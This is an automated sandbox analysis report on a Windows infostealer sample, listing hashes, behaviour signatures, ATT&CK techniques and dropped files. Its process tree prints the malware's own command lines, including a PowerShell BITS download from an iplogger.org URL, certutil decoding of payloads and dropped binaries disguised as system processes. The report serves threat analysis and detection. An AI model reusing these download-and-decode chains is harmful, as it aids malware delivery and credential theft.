Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    08-11-2020 18:07

General

  • Target

    ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.exe

  • Size

    1.8MB

  • MD5

    3202904112ba165a8401ef87661a1b8e

  • SHA1

    052b8ada0a42f8e62ae6252c3f9ad6288485c92d

  • SHA256

    ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723

  • SHA512

    a0619a68fb4b121c762604ebdde44ff7b9693d8b62dc4cfdd2293d0cec6198fb067726ef9561973a544e23262c14a5843ea3c3bf87de8d468bc4125f7f91a5bd

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://iplogger.org/1pzPe7

Signatures

  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 6 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 86 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.exe
    "C:\Users\Admin\AppData\Local\Temp\ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1960
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo aPqmyxWPx
      2⤵
        PID:340
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c powershell -command Start-BitsTransfer -Source https://iplogger.org/1pzPe7 -Destination C:\Users\Admin\AppData\Local\Temp\1
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1656
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -command Start-BitsTransfer -Source https://iplogger.org/1pzPe7 -Destination C:\Users\Admin\AppData\Local\Temp\1
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:928
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c cmd < wMtueyMldwpSh.com
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:792
        • C:\Windows\SysWOW64\cmd.exe
          cmd
          3⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1636
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 1 ezgwO.pJC
            4⤵
            • Runs ping.exe
            PID:396
          • C:\Windows\SysWOW64\certutil.exe
            certutil -decode Vdfl.com Y
            4⤵
              PID:1472
            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
              csrss.com Y
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1664
              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com Y
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                PID:576
                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
                  6⤵
                  • Executes dropped EXE
                  • Checks processor information in registry
                  PID:1988
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\ansnioafcvh.exe"
                    7⤵
                      PID:1484
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\rjwpltfkehl.exe"
                      7⤵
                        PID:296
                • C:\Windows\SysWOW64\PING.EXE
                  ping 127.0.0.1 -n 3
                  4⤵
                  • Runs ping.exe
                  PID:1048
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c cmd < SSVJIWn.com
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1780
              • C:\Windows\SysWOW64\cmd.exe
                cmd
                3⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1748
                • C:\Windows\SysWOW64\PING.EXE
                  ping -n 1 bzfvVJ.gwroE
                  4⤵
                  • Runs ping.exe
                  PID:1600
                • C:\Windows\SysWOW64\certutil.exe
                  certutil -decode hNsNG.com M
                  4⤵
                    PID:340
                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\fontdrvhost.com
                    fontdrvhost.com M
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:932
                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\fontdrvhost.com
                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\fontdrvhost.com M
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: MapViewOfSection
                      PID:396
                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
                        6⤵
                        • Executes dropped EXE
                        • Checks processor information in registry
                        • Suspicious use of FindShellTrayWindow
                        PID:660
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1 -n 3
                    4⤵
                    • Runs ping.exe
                    PID:456

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Credential Access

            Credentials in Files

            2
            T1081

            Discovery

            Query Registry

            2
            T1012

            System Information Discovery

            1
            T1082

            Remote System Discovery

            1
            T1018

            Collection

            Data from Local System

            2
            T1005

            Command and Control

            Web Service

            1
            T1102

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\FvaGtBY.com
              MD5

              f05a275d647c463849a793f4a7f71f52

              SHA1

              d0eef69718c1d16a380fa2b012e12f08304a046f

              SHA256

              da7cbc41e2389d26f34ff44ea4f91ba802d1c1e9452927c6cb1e1fc1f011c52a

              SHA512

              b54cfe18c4ba2be7bf4a6fb323e76743201b627feafcc042e33df672dfb61a3c29e080fa79e7da17a17090a8d89d4ccc69477945b1c6b867c59921c84a894161

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\M
              MD5

              0347e324fb878427506b6ffc5e46f66e

              SHA1

              fa0d50de9f343926c548a9657a9693f60652805c

              SHA256

              22ec3e07bdcd8d6eaeadb4ef7b1b34aa28691369fa99c32c753f8faf15bb658d

              SHA512

              9562ac6eadfe252965ca5c5a91bd50645e3ebe43fd7415d2882ba3b892cb5642f42f1a97e085a7e011f4cfae0dffdc32ade6624574f91e4c7fee1f0d6cc74c35

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\SSVJIWn.com
              MD5

              c38b261e8eafcff70de8b5e8785228fe

              SHA1

              619c651b585dcb0c4d0873a90e650b26a2c3c998

              SHA256

              527aba3ca0be4e0c85d51bc4205bb76313190cfb4d6169e45de6f3cff5f830b7

              SHA512

              041149bf75d2c3061045d359f5a1ec109610d96c92280b10378ad2873e4c1ab9d701d3216139a2fb85b38c916b88052d6fd418154423f9f4f108905bbde9b988

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vdfl.com
              MD5

              746b5a6a825ae849bc4c30673021a9b7

              SHA1

              e96f931d914bd207c0141ee66368d07c41c91020

              SHA256

              257c563c8497ef35038e2262a4a98ba5262d68ff69a3fe9d3c0a1f96bd578fcd

              SHA512

              e21bb2b8c8af5a5b47073871b3feb9f34970d7fa7b746ecf83d39d5ae4f540ac7e25641ce7bd11dff1d14195781eb6399868c952eed103f2dd5a28eff1f3a595

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Y
              MD5

              eb39fd2cb3ba6f58febc3fb85f0009aa

              SHA1

              d9e6e8da51e7db0cb6ac5d6920381b33404e419c

              SHA256

              f0edaa87bd93454585b29076a56fc6dd44b290ffb2c2f255fdb425506cc0b14e

              SHA512

              559a98620345185a47dbf9dbd3e488550f6cd1adb00f210f5bdfb7d894f5d85ebe10f01e28dd49398da95e888dfd5e40c831eb360f61368e498841baa85544cf

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
              MD5

              7098bdf41092092927874259196e5d80

              SHA1

              7ed19875c88e93fe3c0cc38b8bff56c61d0a8307

              SHA256

              140864a83fd7c075010791ea30de0acf1ec4725febb1c30dec785b7a893d8558

              SHA512

              dcb5a1e7fa194546cdf0186d949eb16a638d9f0cdef9f0f149b13e27d046d36d196e4ea7c6ae7d733eaaca31ce1ebd3b11b614ce2607729b9e97feb18e282b03

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
              MD5

              7098bdf41092092927874259196e5d80

              SHA1

              7ed19875c88e93fe3c0cc38b8bff56c61d0a8307

              SHA256

              140864a83fd7c075010791ea30de0acf1ec4725febb1c30dec785b7a893d8558

              SHA512

              dcb5a1e7fa194546cdf0186d949eb16a638d9f0cdef9f0f149b13e27d046d36d196e4ea7c6ae7d733eaaca31ce1ebd3b11b614ce2607729b9e97feb18e282b03

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
              MD5

              7098bdf41092092927874259196e5d80

              SHA1

              7ed19875c88e93fe3c0cc38b8bff56c61d0a8307

              SHA256

              140864a83fd7c075010791ea30de0acf1ec4725febb1c30dec785b7a893d8558

              SHA512

              dcb5a1e7fa194546cdf0186d949eb16a638d9f0cdef9f0f149b13e27d046d36d196e4ea7c6ae7d733eaaca31ce1ebd3b11b614ce2607729b9e97feb18e282b03

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\fontdrvhost.com
              MD5

              7098bdf41092092927874259196e5d80

              SHA1

              7ed19875c88e93fe3c0cc38b8bff56c61d0a8307

              SHA256

              140864a83fd7c075010791ea30de0acf1ec4725febb1c30dec785b7a893d8558

              SHA512

              dcb5a1e7fa194546cdf0186d949eb16a638d9f0cdef9f0f149b13e27d046d36d196e4ea7c6ae7d733eaaca31ce1ebd3b11b614ce2607729b9e97feb18e282b03

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\fontdrvhost.com
              MD5

              7098bdf41092092927874259196e5d80

              SHA1

              7ed19875c88e93fe3c0cc38b8bff56c61d0a8307

              SHA256

              140864a83fd7c075010791ea30de0acf1ec4725febb1c30dec785b7a893d8558

              SHA512

              dcb5a1e7fa194546cdf0186d949eb16a638d9f0cdef9f0f149b13e27d046d36d196e4ea7c6ae7d733eaaca31ce1ebd3b11b614ce2607729b9e97feb18e282b03

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\fontdrvhost.com
              MD5

              7098bdf41092092927874259196e5d80

              SHA1

              7ed19875c88e93fe3c0cc38b8bff56c61d0a8307

              SHA256

              140864a83fd7c075010791ea30de0acf1ec4725febb1c30dec785b7a893d8558

              SHA512

              dcb5a1e7fa194546cdf0186d949eb16a638d9f0cdef9f0f149b13e27d046d36d196e4ea7c6ae7d733eaaca31ce1ebd3b11b614ce2607729b9e97feb18e282b03

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\hNsNG.com
              MD5

              cce7c63f1535aabdaf4a9e39a4474569

              SHA1

              c9d7580a5db9fce68dcd8077e7d6ab5a049c79c6

              SHA256

              9734c779730a237aad5a367ef5a5aeaddd3c14283249b7c593b134843de38249

              SHA512

              865c430a3000e2ba66c7376e8c287369c68c3d2737a8eed6df35925ba3764d75e70eba6b615edabaffeb5009fc2b2a3234070488344a2671bdcf783656c56568

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\mGsikxxdjfKtYgWEgo.com
              MD5

              a9358bd23e30f7ae680ba7e16203c9d6

              SHA1

              200fac7d7ef5a25429501fff125dae65330a1ece

              SHA256

              fc755c8f26f7ea5a1d125be3df0c123e97a80f325cd3b4f433656c6391b1d1c1

              SHA512

              79eb9e40ce16a8f12c96311dc80c6a974ed42e3e1157c9f2369a912637ff21ea783e94bf8fa43b94715d981fddcfc0a80c5ee45bcef5af189c198ecc90943fbf

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              MD5

              5e3830ee3282a53920e00784fec44cfd

              SHA1

              3e43d4ac8ea7efdf5921ad123f4eabd5648778ab

              SHA256

              4a35c36f3f41f977fe1f0174d43c8cb9bd25a823b5f2a1970e501d839e1f8276

              SHA512

              ad87e4db060630f5a85d4ba25e53ca81da163c7888c2b4beddba8433dbbccd3979679e5385e40a931830e3c34c0d1b8715146b5d300d7edbb554cb7cae43f775

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              MD5

              5e3830ee3282a53920e00784fec44cfd

              SHA1

              3e43d4ac8ea7efdf5921ad123f4eabd5648778ab

              SHA256

              4a35c36f3f41f977fe1f0174d43c8cb9bd25a823b5f2a1970e501d839e1f8276

              SHA512

              ad87e4db060630f5a85d4ba25e53ca81da163c7888c2b4beddba8433dbbccd3979679e5385e40a931830e3c34c0d1b8715146b5d300d7edbb554cb7cae43f775

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              MD5

              5e3830ee3282a53920e00784fec44cfd

              SHA1

              3e43d4ac8ea7efdf5921ad123f4eabd5648778ab

              SHA256

              4a35c36f3f41f977fe1f0174d43c8cb9bd25a823b5f2a1970e501d839e1f8276

              SHA512

              ad87e4db060630f5a85d4ba25e53ca81da163c7888c2b4beddba8433dbbccd3979679e5385e40a931830e3c34c0d1b8715146b5d300d7edbb554cb7cae43f775

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\wMtueyMldwpSh.com
              MD5

              fd487a7ef90b1cd7211ac94d4e773478

              SHA1

              c2091875f5602effb1c2af62619027b4770b56f3

              SHA256

              3b38bbd04026882191f7bf67c2ea06cc1c63fecf0440361abb1e125c2d3a75ba

              SHA512

              1455649893c35b4d37859066404208de560fa006a4c76b5ab89396532e2d83a5148c5da85cd1546cb01275f9b70bbd9328068ad44147b3ee50b1bcf34d727392

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\xWnAext.com
              MD5

              392e5cc019e763f0019337277db81081

              SHA1

              9402765f17c7e2b0cf15520ffef56476a855ab2c

              SHA256

              852ed04ac131800dae464471a51a7d54063dad88ce1ebab7ce22fcab66900d01

              SHA512

              4e0de123e4ff6f40bacded145bc0505a73a2cf39ff01878b8703b1dd6fc0059d4ce1e39c0d6043b389b7ecee0126e326c6e258b0bf472bf297179b3b945db553

            • \Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
              MD5

              7098bdf41092092927874259196e5d80

              SHA1

              7ed19875c88e93fe3c0cc38b8bff56c61d0a8307

              SHA256

              140864a83fd7c075010791ea30de0acf1ec4725febb1c30dec785b7a893d8558

              SHA512

              dcb5a1e7fa194546cdf0186d949eb16a638d9f0cdef9f0f149b13e27d046d36d196e4ea7c6ae7d733eaaca31ce1ebd3b11b614ce2607729b9e97feb18e282b03

            • \Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
              MD5

              7098bdf41092092927874259196e5d80

              SHA1

              7ed19875c88e93fe3c0cc38b8bff56c61d0a8307

              SHA256

              140864a83fd7c075010791ea30de0acf1ec4725febb1c30dec785b7a893d8558

              SHA512

              dcb5a1e7fa194546cdf0186d949eb16a638d9f0cdef9f0f149b13e27d046d36d196e4ea7c6ae7d733eaaca31ce1ebd3b11b614ce2607729b9e97feb18e282b03

            • \Users\Admin\AppData\Local\Temp\7ZipSfx.000\fontdrvhost.com
              MD5

              7098bdf41092092927874259196e5d80

              SHA1

              7ed19875c88e93fe3c0cc38b8bff56c61d0a8307

              SHA256

              140864a83fd7c075010791ea30de0acf1ec4725febb1c30dec785b7a893d8558

              SHA512

              dcb5a1e7fa194546cdf0186d949eb16a638d9f0cdef9f0f149b13e27d046d36d196e4ea7c6ae7d733eaaca31ce1ebd3b11b614ce2607729b9e97feb18e282b03

            • \Users\Admin\AppData\Local\Temp\7ZipSfx.000\fontdrvhost.com
              MD5

              7098bdf41092092927874259196e5d80

              SHA1

              7ed19875c88e93fe3c0cc38b8bff56c61d0a8307

              SHA256

              140864a83fd7c075010791ea30de0acf1ec4725febb1c30dec785b7a893d8558

              SHA512

              dcb5a1e7fa194546cdf0186d949eb16a638d9f0cdef9f0f149b13e27d046d36d196e4ea7c6ae7d733eaaca31ce1ebd3b11b614ce2607729b9e97feb18e282b03

            • \Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              MD5

              5e3830ee3282a53920e00784fec44cfd

              SHA1

              3e43d4ac8ea7efdf5921ad123f4eabd5648778ab

              SHA256

              4a35c36f3f41f977fe1f0174d43c8cb9bd25a823b5f2a1970e501d839e1f8276

              SHA512

              ad87e4db060630f5a85d4ba25e53ca81da163c7888c2b4beddba8433dbbccd3979679e5385e40a931830e3c34c0d1b8715146b5d300d7edbb554cb7cae43f775

            • \Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              MD5

              5e3830ee3282a53920e00784fec44cfd

              SHA1

              3e43d4ac8ea7efdf5921ad123f4eabd5648778ab

              SHA256

              4a35c36f3f41f977fe1f0174d43c8cb9bd25a823b5f2a1970e501d839e1f8276

              SHA512

              ad87e4db060630f5a85d4ba25e53ca81da163c7888c2b4beddba8433dbbccd3979679e5385e40a931830e3c34c0d1b8715146b5d300d7edbb554cb7cae43f775

            • memory/296-75-0x0000000000000000-mapping.dmp
            • memory/340-0-0x0000000000000000-mapping.dmp
            • memory/340-49-0x0000000000000000-mapping.dmp
            • memory/396-58-0x0000000000000000-mapping.dmp
            • memory/396-6-0x0000000000000000-mapping.dmp
            • memory/456-54-0x0000000000000000-mapping.dmp
            • memory/576-22-0x0000000000000000-mapping.dmp
            • memory/660-64-0x0000000000463A1F-mapping.dmp
            • memory/660-63-0x0000000000400000-0x00000000004A3000-memory.dmp
              Filesize

              652KB

            • memory/660-66-0x0000000000400000-0x00000000004A3000-memory.dmp
              Filesize

              652KB

            • memory/792-2-0x0000000000000000-mapping.dmp
            • memory/928-41-0x0000000005710000-0x0000000005711000-memory.dmp
              Filesize

              4KB

            • memory/928-11-0x0000000004890000-0x0000000004891000-memory.dmp
              Filesize

              4KB

            • memory/928-10-0x0000000000DC0000-0x0000000000DC1000-memory.dmp
              Filesize

              4KB

            • memory/928-27-0x0000000005750000-0x0000000005751000-memory.dmp
              Filesize

              4KB

            • memory/928-9-0x0000000004960000-0x0000000004961000-memory.dmp
              Filesize

              4KB

            • memory/928-32-0x00000000057B0000-0x00000000057B1000-memory.dmp
              Filesize

              4KB

            • memory/928-8-0x0000000000B30000-0x0000000000B31000-memory.dmp
              Filesize

              4KB

            • memory/928-40-0x0000000006300000-0x0000000006301000-memory.dmp
              Filesize

              4KB

            • memory/928-33-0x00000000061C0000-0x00000000061C1000-memory.dmp
              Filesize

              4KB

            • memory/928-7-0x0000000073D00000-0x00000000743EE000-memory.dmp
              Filesize

              6.9MB

            • memory/928-42-0x0000000005790000-0x00000000057A0000-memory.dmp
              Filesize

              64KB

            • memory/928-60-0x00000000056E0000-0x00000000056E1000-memory.dmp
              Filesize

              4KB

            • memory/928-3-0x0000000000000000-mapping.dmp
            • memory/932-52-0x0000000000000000-mapping.dmp
            • memory/1048-18-0x0000000000000000-mapping.dmp
            • memory/1472-13-0x0000000000000000-mapping.dmp
            • memory/1484-74-0x0000000000000000-mapping.dmp
            • memory/1600-48-0x0000000000000000-mapping.dmp
            • memory/1632-73-0x000007FEF5E90000-0x000007FEF610A000-memory.dmp
              Filesize

              2.5MB

            • memory/1636-5-0x0000000000000000-mapping.dmp
            • memory/1656-1-0x0000000000000000-mapping.dmp
            • memory/1664-16-0x0000000000000000-mapping.dmp
            • memory/1748-47-0x0000000000000000-mapping.dmp
            • memory/1780-45-0x0000000000000000-mapping.dmp
            • memory/1988-70-0x00000000004040AB-mapping.dmp
            • memory/1988-69-0x0000000000400000-0x0000000000423000-memory.dmp
              Filesize

              140KB

            • memory/1988-72-0x0000000000400000-0x0000000000423000-memory.dmp
              Filesize

              140KB